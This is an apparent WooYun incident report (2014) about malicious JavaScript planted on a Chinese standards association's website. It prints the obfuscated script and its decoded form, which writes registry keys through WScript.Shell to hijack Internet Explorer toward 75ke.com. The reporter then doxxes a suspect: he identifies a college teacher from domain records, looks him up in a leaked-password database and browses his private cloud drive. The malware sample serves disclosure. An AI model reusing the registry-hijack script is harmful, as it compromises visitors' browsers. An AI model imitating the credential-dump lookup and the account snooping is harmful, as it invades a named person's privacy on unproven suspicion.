当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048952

漏洞标题:中国工程建设标准化协会被黑嵌恶意JS

相关厂商:cncert国家互联网应急中心

漏洞作者: 袋鼠妈妈

提交时间:2014-01-16 15:24

修复时间:2014-03-02 15:25

公开时间:2014-03-02 15:25

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-16: 细节已通知厂商并且等待厂商处理中
2014-01-21: 厂商已经确认,细节仅向厂商公开
2014-01-31: 细节向核心白帽子及相关领域专家公开
2014-02-10: 细节向普通白帽子公开
2014-02-20: 细节向实习白帽子公开
2014-03-02: 细节向公众公开

简要描述:

中国工程建设标准化协会被黑嵌恶意JS,射出个大黑阔

详细说明:

中国工程建设标准化协会(简称中国建设标协)

主办单位:中国工程建设标准化协会
地址:北京三里河路9号北附楼402
技术支持:住房和城乡建设部信息中心
电话:010-58934012
mail:[email protected]


网址:http://www.cecs.org.cn/
#1.恶意js:

http://www.cecs.org.cn//Script/Script.js

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('0.1("<j w=\\"v\\"> ");0.1("9 3 = y x(\\"u.7\\");");0.1("9 2=\\"C:\\\\\\\\s r\\\\\\\\t G\\\\\\\\F.H I:\\/\\/A.z.B\\/?E\\";");0.1("3.4(\\"b\\\\\\\\5\\\\\\\\{c-8-d-f-e}\\\\\\\\7\\\\\\\\a\\\\\\\\6\\\\\\\\\\", 2,\\"D\\");");0.1("3.4(\\"b\\\\\\\\5\\\\\\\\{q-p-l-h-g}\\\\\\\\i\\\\\\\\k\\\\\\\\6\\\\\\\\\\",2);");0.1("3.4(\\"n\\\\\\\\m\\\\\\\\o\\\\\\\\5\\\\\\\\{c-8-d-f-e}\\\\\\\\7\\\\\\\\a\\\\\\\\6\\\\\\\\\\", 2);");0.1("3.4(\\"n\\\\\\\\m\\\\\\\\o\\\\\\\\5\\\\\\\\{q-p-l-h-g}\\\\\\\\i\\\\\\\\k\\\\\\\\6\\\\\\\\\\", 2);");0.1("<\\/j>");0.1("");',45,45,'document|writeln|url|WshShell|RegWrite|CLSID|Command|Shell|763F|var|Open|HKEY_CLASSES_ROOT|86AEFBE8|0647|A93278894D8E|899C|08002B30309D|A2EA|shell|script|OpenHomePage|1069|SOFTWARE|HKEY_LOCAL_MACHINE|Classes|42A0|871C5380|Files|Program|Internet|WScript|JavaScript|language|ActiveXObject|new|75ke|www|com||REG_SZ|1103|iexplore|Explorer|exe|http'.split('|'),0,{}));
function picNewsCirculation(cirTime) {
    if (document.getElementById("picnews_0") != null) {
        setInterval("picNewsClick()", cirTime);
    }
}


解密后:

document.writeln("<script language=\"JavaScript\"> ");
document.writeln("var WshShell = new ActiveXObject(\"WScript.Shell\");");
document.writeln("var url=\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe http:\/
\/www.75ke.com\/?1103\";");
document.writeln("WshShell.RegWrite(\"HKEY_CLASSES_ROOT\\\\CLSID\\\\{86AEFBE8-763F-0647-899C-
A93278894D8E}\\\\Shell\\\\Open\\\\Command\\\\\", url,\"REG_SZ\");");
document.writeln("WshShell.RegWrite(\"HKEY_CLASSES_ROOT\\\\CLSID\\\\{871C5380-42A0-1069-A2EA-
08002B30309D}\\\\shell\\\\OpenHomePage\\\\Command\\\\\",url);");
document.writeln("WshShell.RegWrite
(\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{86AEFBE8-763F-0647-899C-A93278894D8E}
\\\\Shell\\\\Open\\\\Command\\\\\", url);");
document.writeln("WshShell.RegWrite
(\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{871C5380-42A0-1069-A2EA-08002B30309D}
\\\\shell\\\\OpenHomePage\\\\Command\\\\\", url);");
document.writeln("<\/script>");
document.writeln("");


#2.搜下75ke.com的域名信息:

75ke.com.gif

通过度娘[email protected]邮箱没有结果,度下电话呢:

0531-82381234.GIF

发现另外一个域名gou57.net,查看其域名注册信息,我们可以发现以上两个域名皆在http://eb.com.cn注册,注册时间相差不远,续费时间都在2013-2-25,如果不是同一个人,会不会太巧合?看看gou57.net主人和黑阔有木有关系
#3.百度[email protected] ,发现是山东某校汽车学院的老师,http://www.docin.com/p-380693279.html http://www.ycxy.com/cn/2013/195124.html

.GIF

_毕业论文1.GIF

_毕业论文2.GIF

.GIF


#4.在某知名社工库中翻到其其他ID及密码信息,查询到该IDys168网盘地址:

.GIF

ys1681.gif


#5.网盘中,有该老师课程表以及简历等,还有大量大牛工具,shell记录:

ys1682.gif

ys1683.gif


#6.JCSS要请他喝茶不?呃,反正我不想喝茶,你可以直接忽略这个动...吓尿了打错字

漏洞证明:

1.GIF


以下仅为个人猜测,不妥请忽略:
1.两个域名登记的电话为同一个,有可能是同一个学校不同人注册,但是续费时候同一天?有点...呵呵,而且从域名外观看类似,应该是做垃圾站吧
2.如果gou57.net的主人仅仅是学院老师,那为啥网盘里那么多大牛教程还有N多shell呢NND,更气愤的是,里面还有色文,尼玛大半夜的看得我热血沸腾,于是我深思了下,觉得两个域名属于同一个人.老师就是那个挂js的大牛牛
3.个人臆测,随意审核.谢谢

修复方案:

版权声明:转载请注明来源 袋鼠妈妈@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-01-21 08:46

厂商回复:

CNVD确认并复现所述情况,作为安全事件进行处置。对于后续白帽子分析的挂马情况,CNVD将转由CNCERT进行分析跟进,比对黑名单情况。

最新状态:

暂无